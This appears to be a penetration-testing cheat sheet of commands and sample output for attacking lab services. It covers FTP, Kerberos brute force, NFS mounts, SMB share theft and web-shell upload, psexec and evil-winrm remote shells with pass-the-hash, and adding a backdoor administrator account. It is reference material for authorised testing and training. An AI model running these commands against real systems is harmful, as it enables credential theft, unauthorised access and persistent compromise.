Skip to content

Services

FTP (port 21)

Anonymous login

nmap -p 21 --script=ftp-anon 10.10.174.58

Download everything

wget -m --user='USERNAME' --password='PASSWORD' ftp://127.0.0.1

Kerberos (port 88)

Enumeration & bruteforce

Kerbrute has four main commands:

  • bruteuser - Bruteforce a single user's password from a wordlist
  • bruteforce - Read username:password combos from a file or stdin and test them
  • passwordspray - Test a single password against a list of users
  • userenum - Enumerate valid domain usernames via Kerberos

See AD - enumeration.

RPC / NFS (port 111, 2049, 20048)

Interesting files : /etc/nfs.conf, /etc/fstab and /etc/exports

$ rpcinfo -p | grep nfs

100003    3   tcp   2049  nfs
100003    4   tcp   2049  nfs
100227    3   tcp   2049  nfs_acl

Nmap NSE :

$ sudo nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.220.222
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-30 13:48 CET
Nmap scan report for 10.10.220.222
Host is up (0.035s latency).

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-showmount:
|_  /var *
| nfs-statfs:
|   Filesystem  1K-blocks  Used       Available  Use%  Maxfilesize  Maxlink
|_  /var        9204224.0  1836532.0  6877096.0  22%   16.0T        32000

Nmap done: 1 IP address (1 host up) scanned in 2.38 seconds

Show NFS mount

$ showmount -e 10.10.200.32
Export list for 10.10.200.32:
/home/ubuntu/sharedfolder *
/tmp                      *
/home/backup              *
$ sudo mkdir /mnt/nfs1
$ sudo mount -t nfs -o rw 10.10.200.32:/home/ubuntu/sharedfolder /mnt/nfs1
$ cd /mnt/nfs1
...

Mount NFS partition :

$ sudo mkdir /mnt/ntfs1
$ sudo mount -t nfs 10.10.220.222:/var /mnt/ntfs1
$ cd /mnt/ntfs1
$ ls
backups  cache  crash  lib  local  lock  log  mail  opt  run  snap  spool  tmp  www

Samba (port 139, 445)

List shares

$ sudo nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.220.222
[...]
Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\10.10.220.222\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (kenobi server (Samba, Ubuntu))
|     Users: 2
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
[...]

$ crackmapexec smb 10.10.86.204 --shares

$ smbclient -L 10.10.86.204
Password for [MYGROUP\xanhacks]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        nt4wrksv        Disk
SMB1 disabled -- no workgroup available

Download / upload files

$ smbclient -U 'guest' '\\10.10.86.204\nt4wrksv'
Password for [MYGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Jul 25 23:46:04 2020
  ..                                  D        0  Sat Jul 25 23:46:04 2020
  passwords.txt                       A       98  Sat Jul 25 17:15:33 2020

                7735807 blocks of size 4096. 4932712 blocks available
smb: \> get passwords.txt
getting file \passwords.txt of size 98 as passwords.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> mput shell.aspx
Put file shell.aspx? y
putting file shell.aspx as \shell.aspx (40.5 kb/s) (average 40.5 kb/s)

Recursive download

Recursively download all the files of the share using smbget -R :

$ smbget -R smb://10.10.220.222/anonymous
Password for [xanhacks] connecting to //anonymous/10.10.220.222: <press enter>
Using workgroup WORKGROUP, user xanhacks
smb://10.10.220.222/anonymous/log.txt
Downloaded 11.95kB in 1 seconds

Bruteforce SMB

$ cme smb 10.10.10.182 -u users.lst -p passwords.list
[...]

Shell over SMB (psexec.py)

How psexec.py works ?

  1. Establishes an SMB network connection to a target system using administrator credentials
  2. Pushes a copy of a receiver process named PSEXESVC.EXE to the target system’s ADMIN$ share
  3. Launches PSEXESVC.EXE, which sends input and output to a named pipe
$ cme smb 10.10.10.182 -u administrator -p 'pass123'
SMB ... (Pwn3d!)
$ psexec.py administrator:pass123@10.10.10.182
[...]
C:\Windows\system32>

CIFS (port 445)

CIFS (Common Internet File System) is a protocol that gained popularity around the year 2000, as vendors worked to establish an Internet Protocol-based file-sharing protocol.

CIFS is now considered obsolete, because most modern data storage systems use the more robust Server Message Block (SMB) 2.0 and 3.0 file-sharing protocols, which were major upgrades to CIFS.

Mount partition

$ mkdir /mnt/data
$ sudo mount -t cifs -o 'user=r.thompson,password=admin123' //10.10.10.182/Data /mnt/data

RDP (port 3389)

Windows user need to be in the Remote Desktop Users or Administrators group to use RDP.

net user USERNAME PASSWORD /add
net localgroup Administrators USERNAME /add
net localgroup "Remote Management Users" USERNAME /add

RDP using rdesktop :

$ rdesktop -u <username> -p <password> <ip>

GUI using remmina.

WinRM (port 5985)

Windows user need to be in the Remote Management Users group to use WinRM.

You can use evil-winrm to obtain a remote shell.

To check :

$ cme winrm 10.200.10.196 -u administrator -p 'pass123'
WINRM ... (Pwn3d!)

Gain shell :

$ evil-winrm -i 10.200.10.196 -u administrator -p 'admin123'

$ evil-winrm -i 10.200.10.196 -u administrator -H '37db630168e5f82aafa8461e05c6bbd1'